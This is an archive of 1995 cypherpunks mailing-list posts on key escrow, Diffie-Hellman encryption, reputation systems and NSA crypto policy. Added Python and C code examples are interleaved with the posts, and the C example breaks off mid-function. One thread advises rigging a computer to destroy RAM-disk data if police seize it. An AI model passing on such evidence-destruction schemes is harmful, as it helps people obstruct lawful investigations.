so you can use a new x every time (e.g. request directly from the user,
though that's difficult for email, or a keyserver that maintains a set of
keys to be doled out.)

>    "Certified escrow agents -- Can products be designed so that
>     only escrow agents certified by the U.S. government (domestic, 
>     or under suitable arrangements, foreign) are utilized?  
>     What should be the criteria for an acceptable U.S. escrow agent?"

The technical and political questions are quite different.  
Technically, you could have the software require a hierarchical-style
certificate for the key-master keys with a US Government CA wired in.
It's not totally foolproof - patching the CA is easy unless you've got
some sort of checksum on the software.  But it's a start, and it's simple
enough that either the US could authorize separate versions for France
or certify the French government's key-master agency.

Also, there's a need for escrow/keymaster agents to be negotiable per-message -
since escrow inherently requires the trust of all parties, and probably
contractual agreements as well, and government-enforced keymastering
may require satisfying multiple governments, parties will presumably
have different lists of acceptable keymasters.

>We all know that Tim's Flakey Key Escrow Service is most likely not
>"an acceptable US escrow agent."  But since CKE is a good thing, what
>are the characteristics of an acceptable service to us?

As far as the political criteria go, I believe the traditional formulation
is along the lines of "I am not now, nor have I ever been, a member of...." :-)
Establishing criteria is difficult, and depends on whether the whole system
will be defined by laws passed by Congress or only by organizational policy;
there are also issues of control between the Commerce Department, NIST, NSA,
and the State Department.  

For Commercial Key Escrow, or commercial key-backup services, the criteria are 
"whoever can be trusted to provide the services the customers want".
In this case, of course, the service most customers want is to be left alone,
or, failing that, to have the government's Master Key system provide minimal
risk to the security of the actual transactions - 64 bit keys are not enough
security for any high-valued financial transactions, though they may suffice
for credit cards.
One required characteristic would appear to be either sufficiently deep pockets
to collect judgements for violations of trust or a sufficiently high
reputation that violations of trust are not expected.

Most of the commercial market for key escrow or backup services fits into three
categories - backups for the owner/sender of a file (which they can provide
themselves, using techniques like PGP's Encrypt-to-Self option, or file backups
with secret-sharing), acknowledgements of transmission (signed hashes would do),
and dispute-resolution issues (verifying the contents of a message which may
require information from both parties or ephemeral session key information.)
Most can be provided by the kind of services currently provided by companies
like bonding agencies, emergency backup and offsite storage companies, etc.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 4 Sep 95 17:23:55 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: Basic Public key algorithms.
Message-ID: <199509050020.RAA27203@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:01 PM 9/2/95 CDT, droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke) wrote:
>After doing quite a bit of poking around, I am somewhat discouraged
>in my attempts to find a simple *pure* public key encryption method,
>without a lot of other stuff wrapped around it. 

Pure public-key is usually not very useful, since it's rather slow
for encrypting big messages by itself.  PKP has the patents to all public-
key systems until mid-1997, and for RSA until some time like 2001,
and Schnorr for longer.  Unfortunately, RSAREF (except for one version
where they slipped) requires non-commercial users to limit themselves
to the published interface or get explicit permission, and the published
interface always throws in DES with a random key for encryption.
Since you're talking embedded systems, you're probably commercial and
high enough volume that the cost for licensing RSA is probably low enough.

>What I need is to encrypt between 45 and 55 bits of information
>using a public key algorithm in an embedded environment. 

45-55 bits may be tough, depending on the constraints of your
environment - most public-key systems need 768-1024 bits of
key to be reasonably secure, and need to send an output field
at least that long to be decodeable.  If that's not a problem,
you've got some choices.  For instance, you could use Diffie-Hellman
to create a shared secret, and just XOR that with your material
(have the workstation generate a master x, g, and p, and
store g**x in your embedded system; choose a random y each time, and
send g**y mod p and the first |M| bits of (g**xy mod p) xor M.)
To do that, you need to store g**x, g, and p, possibly in ROM,
and enough code to do modular exponentiation and random number generation;
hopefully your system will have some kind of quasi-physical source of
randomness.


#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
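
The Diffie-Hellman-and-XOR scheme sketched in the reply above, as an added example that is not code from the post: the workstation keeps x, the device stores only g, p and g**x, and each message carries g**y mod p plus the masked bits. The modulus (the Mersenne prime 2**1279 - 1), the base 3 and all function names are assumptions chosen so the block runs offline; the last two functions show what the bare XOR mask does not protect against.

```python
import secrets

# Constructed demo parameters (assumptions, not from the post). A Mersenne
# prime is certain to be prime and easy to write down, but a deployment would
# use a vetted group rather than a special-form modulus.
P = 2**1279 - 1
G = 3
P_BITS = P.bit_length()


def workstation_keygen():
    """Workstation: pick the master secret x and publish g**x mod p to the device."""
    x = secrets.randbelow(P - 3) + 2
    return x, pow(G, x, P)


def _mask(shared: int, nbits: int) -> int:
    """First nbits (most significant) of the shared secret as a P_BITS-wide field."""
    return shared >> (P_BITS - nbits)


def device_encrypt(gx: int, message: int, nbits: int, y=None):
    """Device: needs only g, p, g**x, modular exponentiation and a random y."""
    if not 0 <= message < (1 << nbits):
        raise ValueError("message does not fit in nbits")
    if y is None:
        y = secrets.randbelow(P - 3) + 2      # must be fresh for every message
    return pow(G, y, P), message ^ _mask(pow(gx, y, P), nbits)


def workstation_decrypt(x: int, gy: int, masked: int, nbits: int) -> int:
    """Workstation: rebuild g**xy from g**y and strip the mask."""
    if not 1 < gy < P - 1:
        raise ValueError("degenerate g**y value")
    return masked ^ _mask(pow(gy, x, P), nbits)


def flipped_bit_goes_undetected(x, gx, message, nbits) -> bool:
    """XOR masking has no integrity: a bit flipped in transit flips the same
    plaintext bit and decryption still succeeds."""
    gy, masked = device_encrypt(gx, message, nbits)
    return workstation_decrypt(x, gy, masked ^ 1, nbits) == message ^ 1


def reused_y_leaks_xor(gx, m1, m2, nbits) -> bool:
    """If y repeats, both messages share one mask and their XOR is exposed."""
    y = secrets.randbelow(P - 3) + 2
    _, c1 = device_encrypt(gx, m1, nbits, y=y)
    _, c2 = device_encrypt(gx, m2, nbits, y=y)
    return c1 ^ c2 == m1 ^ m2
```

With these parameters each 50-bit message costs a 1279-bit g**y on the wire, which is the output-size cost the reply mentions.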





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 4 Sep 95 14:36:54 PDT
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <199509041725.TAA12314@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.950904173143.17862B-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Sep 1995, Anonymous wrote:

> Date: Mon, 4 Sep 1995 19:25:07 +0200
> From: Anonymous <anon-remailer@utopia.hacktic.nl>
> To: mail2news@utopia.hacktic.nl, cypherpunks@toad.com
> Newgroups: alt.security.pgp, alt.politics.org.fbi
> Subject: Re: Emergency File Wipe Algorithim
> 
> When a running computer is seized in some sort of law enforcement
> raid, what are the chances someone would think to backup the
> contents of a RAMDISK drive prior to powering it down?
> 
> 

Why would you even ask this question?  If the odds are > 0 (which they 
are) they are too high as the solution is simple.

A screensaver which shuts down the system entirely if anything but "}" is 
pressed.

If any key but the secret one is pressed by an excited agent, the ramdisk 
is gone.  If the computer is simply powered down, the ramdisk is gone.

I suggest, rather than a ramdisk however, an encrypted partition a la 
CryptDisk or Secure(Drive? Device?).


---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@access.digex.net>
Date: Mon, 4 Sep 95 14:40:09 PDT
To: unicorn@access2.digex.net
Subject: Returned mail: User unknown
Message-ID: <199509042136.RAA18457@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Mon, 4 Sep 1995 17:35:13 -0400
from unicorn@localhost

   ----- The following addresses had delivery problems -----
Anonymous <anon-remailer@utopia.hacktic.nl>  (unrecoverable error)

   ----- Transcript of session follows -----
... while talking to utopia.hacktic.nl.:
>>> RCPT To:<anon-remailer@utopia.hacktic.nl>
<<< 550 <anon-remailer@utopia.hacktic.nl>... User unknown
550 Anonymous <anon-remailer@utopia.hacktic.nl>... User unknown
451 cypherpunks@toad.com... reply: read error from toad.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kkennedy@mindspring.com (Ken Kennedy)
Date: Mon, 4 Sep 95 10:57:41 PDT
To: Jay Campbell <edge@got.net>
Subject: Re: Helping out on site
In-Reply-To: <Pine.SGI.3.91.950902194010.8460C-100000@Sequoia.picosof.com>
Message-ID: <199509041757.NAA21117@dylan.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


On 2 Sep 1995 20:47:04 -0600, you wrote:

>On 2 Sep 1995, Dar Scott wrote:
>
>> >I finished my first release, a megabyte-sized file done in MORE, a powerful
>> >outline processor (which enabled me to maintain notes, make
>> >cross-references, and generally manage such a huge writing project). I
>> >released it last year, and put it in my anonymous ftp account at
>> >ftp.netcom.com, in the directory /pub/tc/tcmay, as the file CP-FAQ. Netcom
>> >is often very crowded, though.
>> 
>> After several tries I was not able to get this.  Has anyone made it
>> available in an alternate location?
>
>Tim mentioned that we're planning on spiffing up the cypherpunks web
>site (including using a real web server) and the cyphernomicon is an
>obvious candidate for inclusion - depending on how many people help out,
>the new site (a quasi-mirror at first, till we get sameer/et al's
>go-ahead) should be live within a couple weeks.
>
>If you're interested in gathering documents, hacking HTML, or anything
>else involved in creating/maintaining a web hierarchy, drop me a line.
>The space/delivery of the documents we're providing for free, but I
>don't have a budget to hire a staff to do things the "right way" (my way :)
>for this project.
>
>--
>   Jay Campbell - Regional Operations Manager
>   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node)   edge@you.got.net 
>                  "Shoot the Fruit Loop"               408.469.9400
>
>
Jay:

Let me know if I can be of any assistance.  I'm no UNIX guru, but I
can find my way around, and I can "hack"(literally! :-) ) HTML (I use
the HotDog HTML editor).  I've been lurking around the list for awhile
now, and this looks like a good opportunity to be "of service".  Just
let me know, or reply if you have any questions.  Thanks.


Later,

     Ken Kennedy  <kenzoid@io.com> or <kkennedy@mindspring.com>
                  Finger kenzoid@io.com for PGP public key...
                  http://www.io.com/~kenzoid/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 4 Sep 95 15:25:40 PDT
To: cypherpunks@toad.com
Subject: Re: e$: More fun with cash: Senate Bill 307
Message-ID: <199509042224.SAA05533@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn wrote:

<snips>
>
>Actually it was aimed at the rumors that Iran had been printing U.S. 
>currency on a large scale and using it abroad.  When I say Iran, I mean 
>a government backed program.  New York Times had an article on the matter 
>last year.  With enough interest I will try to Lexis/Nexis it.

I had heard that it was the Colombians, branching out from the cocaine
business with those fancy new copy machines, which are supposed to be
able to duplicate the blue & red threads in US currency paper.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMEt7vW1lp8bpvW01AQGnwwQAmPz1SagLoKpAmfUvwyI8GVq8wSOaFH96
vTarz6PxnuNPHhITIAzPeq8EX5N8MexRfHtMbmK0JOxA5L+B+QHP1rTM8mqUbAJh
Gg4ZMC9Jzvhq+JENaP8ZG03+pvm1nnZIr8WarY5DJ8FYNMLvDrSUhhWFu7OSo2a+
fS0NKxpm5Ps=
=HXa+
-----END PGP SIGNATURE-----
Regards, Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas 
when the money is left in the hands of TAXPAYERS, God only knows 
what they do with it.  Bake it into pies, probably.  Anything to 
avoid creating jobs.  -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 4 Sep 95 18:30:48 PDT
To: liberty@gate.net (Jim Ray)
Subject: (NOISE) Re: e$: More fun with cash: Senate Bill 307
Message-ID: <199509050127.SAA14037@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>I had heard that it was the Colombians, branching out from the cocaine
>business with those fancy new copy machines, which are supposed to be
>able to duplicate the blue & red threads in US currency paper.

But if the government was _serious_ about supply-side drug-trade reduction,
wouldn't they _encourage_ this sort of thing?  After all, that way
the Colombians can make as much money as they do today without the
bother of hauling all that white powder into the US?  :-)

(Sure, it's a cypherpunk topic, after all real crypto is mainly about
economics and threat analysis :-)

>See, when the GOVERNMENT spends money, it creates jobs; whereas 
>when the money is left in the hands of TAXPAYERS, God only knows 
>what they do with it.  Bake it into pies, probably.  Anything to 
>avoid creating jobs.  -- Dave Barry
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 4 Sep 95 15:48:00 PDT
To: Jim Ray <liberty@gate.net>
Subject: Re: e$: More fun with cash: Senate Bill 307
In-Reply-To: <199509042224.SAA05533@tequesta.gate.net>
Message-ID: <Pine.SUN.3.91.950904184709.20203B-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Sep 1995, Jim Ray wrote:

> Date: Mon, 04 Sep 1995 18:22:43 -0400
> From: Jim Ray <liberty@gate.net>
> To: cypherpunks@toad.com
> Subject: Re: e$: More fun with cash: Senate Bill 307
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Black Unicorn wrote:
> 
> <snips>
> >
> >Actually it was aimed at the rumors that Iran had been printing U.S. 
> >currency on a large scale and using it abroad.  When I say Iran, I mean 
> >a government backed program.  New York Times had an article on the matter 
> >last year.  With enough interest I will try to Lexis/Nexus it.
> 
> I had heard that it was the Colombians, branching out from the cocaine
> business with those fancy new copy machines, which are supposed to be
> able to duplicate the blue & red threads in US currency paper.
> JMR

I've not heard anything about this.  Any sources?

> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Freedom isn't Freeh
> 
> -----END PGP SIGNATURE-----
> Regards, Jim Ray
> 
> See, when the GOVERNMENT spends money, it creates jobs; whereas 
> when the money is left in the hands of TAXPAYERS, God only knows 
> what they do with it.  Bake it into pies, probably.  Anything to 
> avoid creating jobs.  -- Dave Barry
> ------------------------------------------------------------------------
> PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
> Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
> ------------------------------------------------------------------------
> Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
> ________________________________________________________________________
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Mon, 4 Sep 95 15:50:01 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: pseudonyms & list health
In-Reply-To: <ac7072bf0602100490af@[205.199.118.202]>
Message-ID: <199509042248.SAA08649@csws5.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote:

> At 6:13 AM 9/4/95, Futplex wrote:
> >Deranged Mutant writes:
> >> My worry is about abuse.  One would prefer to save endorsements and find
> >> a way to remove thumbs-downs... also how to prevent one from overdoing a
> >> thumbs-up or -down certification for a person (either to inflate or de-
> >> flate a reputation).
> >
> >A few nuisance lawsuits from people who were given thumbs-downs might do the
> >trick, as with employment recommendations in the U.S. :[
> 
> A good point that deserves further comment. Employers have taken to _saying
> nothing_ about past employees, for fear of lawsuits by disgruntled job
> seekers. So much for free speech, courtesy of the American legal system.

As a somehow related note, my experience with some past jobs is that in
some circumstances the employee turnover rate is high enough that a manager
will give a neutral or good rating simply because they have no experience
with a previous employee who clearly did not deserve a good rating.

Something similar could happen with mailing lists... hardly anyone can
remember when a 'newbie' posted to a list a few years ago, irregardless
of whether a person is still worth a certain rating after a time.

Then again, with a lot of material being archived, it might be easier in
some circumstances to review a person's contributions to a list rather
than rely on a rating... or maybe send a trusted rater to research an
author on the 'net for you rather than maintain a huge database of
ratings that will need some form of interpretation.

Then again, (as Tim and others noted) there's always killfiles and manual
glossing over of threads, etc.

> But as we can't change the litigious nature of American society (and maybe
> European society--I don't know), the emphasis ought to be on digital
> systems and reputations by pseudonyms.

Litigating in a society of pseudonyms may have its own problems anyway...
(imagining suing a trusted friend of yours who prefers to give you much
needed criticisms through a pseudonym so as to protect the friendship...
one example off the top of my head)... How can a 'nym be held legally
accountable as a non-'nym?

-Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 4 Sep 95 18:56:52 PDT
To: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509041641.KAA26589@bvsd.k12.co.us>
Message-ID: <199509050153.SAA23364@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> understand marketing or human psychology. Clipper, the closest the
>> agency has come to creeping out of the darkness of their coffin,
>> was a total fiasco. the self-destructing director of NSA whats-his-name
>> who was running for that FBI position or whatever is another example of how 
>> the inbred spook society has difficulty dealing with anything outside
>> their artificial reality.
>
>I think you are dead wrong.  The NSA has mastered the market psychology.
>Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS...
>the NSA has had a hand in them all.  DES is by far the most popular cipher,
>popular enough that it will take years and years to switch to something new.

no, I think the NSA is very adept at infiltrating and twisting existing
cryptographic market processes to suit their own ends. DES is a good example
of this. it was created by IBM largely, and then "manipulated" by the
NSA. this is well known and understood. the NSA does not work with standards
or markets so much as *interfere* with them. how can you deny this basic
premise embraced by virtually everyone on this list?

>As for the clipper "fiasco,"  I would argue that it was an excellent marketing
>move.  The NSA is aware that there is only a very very small percentage of 
>society that thinks about crypto, with the internet and what have you it is now
>possible for this minority to be heard, the NSA proposes clipper, and so we all
>bitch about it because it's only secure against non-government attacks.  Now
>the public hears this and resists clipper.  There isn't another product that is
>winning support that clipper could have had.  You step back and look at it, and
>the public is exactly where they were 5 years ago, no crypto.  

clearly, the first attempt was to get the public to embrace clipper. lacking
that, they have thwarted natural market progression. I agree they have
done this. but it's like making a pool shot accidentally and saying,
"I meant to do that". the NSA is *not* an agency that has a single clue
about *real* markets. they do have a brilliant ability to leverage their
political coercion skills to the absolute maximum to *manipulate* and
*interfere* and *piss on* newly growing markets. 

the NSA has screwed
up public crypto in uncountable ways. you cannot deny this!! they secretly
visit people doing state-of-the-art research and intimidate them into
silence or going other directions. they visited Mosaic designers to tell
them that the things they were installing in the software were not 
acceptable legally. of course, any other legal arm of the government
would simply sue once the software appeared, but not try to manipulate
the design prior to its release. this is the tactics of an *espionage*
and *intelligence* agency. surprise!!

to say that the NSA understands markets is like saying that thieves
understand how to pick pockets. yeah, that's true, but that's not
quite how I would have put it.

>Clipper was a no lose situation for them, if it is adopted only they can read
>all transactions made with it, if it isn't adopted, everybody can read all 
>transactions, they didn't lose anything. 

huge amounts of cash and credibility have been WASTED on it. the NSA has
lost enormous credibility because of this fiasco. furthermore, the way
they tried to hide behind presidential directives is absolutely repugnant
to anyone who has a belief in the separation of powers within our 
government.

>They have some top minds working for them, 

I know, it's a pity they don't get more respectable and socially
fulfilling jobs at companies, where they can be publicly rewarded
and recognized for their brilliance.

>it's been proven that they have been
>a few steps ahead of the public for a long time; it's foolish to think they 
>don't understand the psychology of the market. 

they *do* understand the market, only to the extent that they are trying
to successfully SABOTAGE what would regularly be its natural growth.
they have been ahead in *theoretical* knowledge, but it was precisely
my *point* that this nebulous eggheadism has demonstrably exploded
when placed in public scrutiny.

do you realize the sheer ability of Microsoft to build software that
succeeds in *markets*? Microsoft doesn't care much about Netscape
because, as one microsoft engineer remarked, "well, it's strange
to talk about market share when you are giving away software for free".
well, the NSA is the absolute *opposite* of Microsoft. they don't
have a *clue* about true market forces. they do however understand
ways in which the government interferes with markets, and they seize
on every one of those mechanisms as their lifeblood for control
and "shadow/invisible oppression".

>Just as the public starts to 
>desire something like public key crypto, they can publish a standard on it
>and it is likely to be adopted.

the NSA is quickly losing relevance. the public *does* desire public
key crypto, and a de facto standard *has* been created, it's called PGP.
if the NSA proposes something in public key areas, it is likely to 
be pissed on by the public as much as Clipper, in many ways because
of the failure of Clipper. clipper in a big sense *was* the NSA's first
step toward public key encryption, and it was widely trounced on.

face it dude, the NSA has shown far less competence in the public arena
than *any* apologist such as yourself can ever demonstrate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 4 Sep 95 16:11:55 PDT
To: cypherpunks@toad.com
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <199509042217.PAA17498@Csli.Stanford.EDU>
Message-ID: <9509042310.AA27080@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Also note the recent posting on sci.crypt by Peter Gutmann about being
>able to recover data from DRAMs and SRAMs after powerdown. It hits
>cryptokeys really bad. 

If the power is cycled as opposed to turned off only then a memory self test 
program will probably erase the data.

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 4 Sep 95 16:25:30 PDT
To: cypherpunks@toad.com
Subject: Re: e$: More fun with cash: Senate Bill 307
Message-ID: <199509042324.TAA65697@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Black Unicorn wrote:
>> 
>> <more snips>
>> >
[I said]
>> 
>> I had heard that it was the Colombians, branching out from the cocaine
>> business with those fancy new copy machines, which are supposed to be
>> able to duplicate the blue & red threads in US currency paper.
>> JMR
>
>I've not heard anything about this.  Any sources?

Sorry, just my vague memory of a Miami Herald article from a while back.
Perhaps someone else on the list is more familiar with good copy-machines.
Around here, the Colombian cartels are depicted as very powerful,
with easy payoffs to the highest levels of their country's political
and judicial systems, and access to technology such as Motorola's
encrypted walkie-talkie (supposedly a restricted-sale item). Of course,
US politicians are completely immune to bribes from drug cartels. <g>
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas 
when the money is left in the hands of TAXPAYERS, God only knows 
what they do with it.  Bake it into pies, probably.  Anything to 
avoid creating jobs.  -- Dave Barry
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 4 Sep 95 10:25:21 PDT
To: cypherpunks@toad.com
Subject: Re: Emergency File Wipe AlgorithimRe: Emergency File Wipe Algorithim
Message-ID: <199509041725.TAA12314@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


When a running computer is seized in some sort of law enforcement
raid, what are the chances someone would think to backup the
contents of a RAMDISK drive prior to powering it down?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bplib@nic.wat.hookup.net
Date: Mon, 4 Sep 95 16:27:48 PDT
To: cypherpunks@toad.com
Subject: Re: VCRPLUS Huffman code
Message-ID: <199509042328.TAA02676@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


I too would be interested in the VCRPlus code. Has anyone broken it?
Tim Philp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edgar@highnrg.sbay.org (Edgar Swank)
Date: Mon, 4 Sep 95 20:19:31 PDT
To: Cypherpunks          <cypherpunks@toad.com>
Subject: SecureDrive 1.4 Announcement Correction
Message-ID: <w9oXaD13w165w@highnrg.sbay.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It has been brought to my attention that the phone number supplied to
me by Michael Paul Johnson for his Catacombs BBS which appeared here
in a previous announcement was incorrect.

The correct number is 303-772-1062.  Other information in the
announcement is correct.

Edgar Swank
SecureDrive Co-Author

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 4 Sep 95 16:48:00 PDT
To: cypherpunks@toad.com
Subject: Re: VCRPLUS Huffman code
In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net>
Message-ID: <9509042347.AA27160@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>I too would be interested in the VCRPlus code. Has anyone broken it?

Challenge time !

C'mon - can do this by exhaustive search probably :-)

There is a lot of stuff in the satellite tv newsgroups on this topic.
I think it's an item well worth cracking.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 4 Sep 95 17:08:23 PDT
To: bplib@nic.wat.hookup.net
Subject: Re: VCRPLUS Huffman code
In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net>
Message-ID: <m0splXE-0009yvC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


It was broken, and I might have the reference in my archives...

If I get time I'll find it.


> I too would be interested in the VCRPlus code. Has anyone broken it?
> Tim Philp
> 
> 


-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Mon, 4 Sep 95 20:44:01 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <8B074DD.00030003EA.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


CW> and relaxation are in the same order of magnitude.  Thus, a few microseconds of
CW> storing the opposite data to the currently stored value will have little effect
CW> on the oxide.  Ideally, the oxide should be exposed to as much stress at the

  Here is a simple way to handle the problem, using our old discredited
friend, XOR. Set up your software to periodically XOR the key with FFFF.
This way, each bit will be a 0 half the time, and a 1 the other half.
You have a flag that tells whether the key is in normal or inverted
form, so that you can quickly perform any necessary computations on it,
but there should not be any long-term memory effect.


 * Free will made me do it!
---
 * Monster@FAmend.Com *    
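
The periodic key inversion described in the message above, sketched in C as an added example (not code from the post or from anyone on the list). The names flipping_key and fk_*, the 16-byte key length and the sample key are assumptions made for illustration; the post's "XOR with FFFF" is applied here as XOR with 0xFF on every byte.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define KEY_LEN 16  /* assumed key size for the example */

/* Hypothetical holder for a long-lived key kept in RAM. */
typedef struct {
    volatile uint8_t bytes[KEY_LEN]; /* key, stored as-is or bit-inverted */
    volatile int inverted;           /* the post's flag: 1 = stored form is ~key */
} flipping_key;

void fk_load(flipping_key *k, const uint8_t *key) {
    for (size_t i = 0; i < KEY_LEN; i++) k->bytes[i] = key[i];
    k->inverted = 0;
}

/* Call from a periodic timer. XOR with 0xFF inverts every stored bit, so over
 * time each memory cell holds 0 and 1 for equal durations. Not thread-safe:
 * real code must keep readers out while the bytes and flag are updated. */
void fk_flip(flipping_key *k) {
    for (size_t i = 0; i < KEY_LEN; i++) k->bytes[i] ^= 0xFF;
    k->inverted = !k->inverted;
}

/* Recover the true key whatever form is stored. The caller owns `out` and
 * must wipe it after use, or the copy becomes the long-lived value. */
void fk_read(const flipping_key *k, uint8_t *out) {
    uint8_t mask = k->inverted ? 0xFF : 0x00;
    for (size_t i = 0; i < KEY_LEN; i++) out[i] = (uint8_t)(k->bytes[i] ^ mask);
}

/* Volatile stores so the compiler cannot drop the wipe as dead code. */
void fk_wipe(flipping_key *k) {
    for (size_t i = 0; i < KEY_LEN; i++) k->bytes[i] = 0;
    k->inverted = 0;
}

/* Simulate `ticks` timer periods and count the periods during which bit
 * `bit` of stored byte `idx` is 1. With flipping != 0 the key is inverted
 * once per period; with flipping == 0 it sits unchanged, as in a naive store. */
unsigned fk_ticks_bit_set(const uint8_t *key, unsigned ticks,
                          size_t idx, unsigned bit, int flipping) {
    flipping_key k;
    unsigned ones = 0;
    fk_load(&k, key);
    for (unsigned t = 0; t < ticks; t++) {
        ones += (k.bytes[idx] >> bit) & 1u;
        if (flipping) fk_flip(&k);
    }
    fk_wipe(&k);
    return ones;
}

int main(void) {
    uint8_t key[KEY_LEN], out[KEY_LEN];
    flipping_key k;
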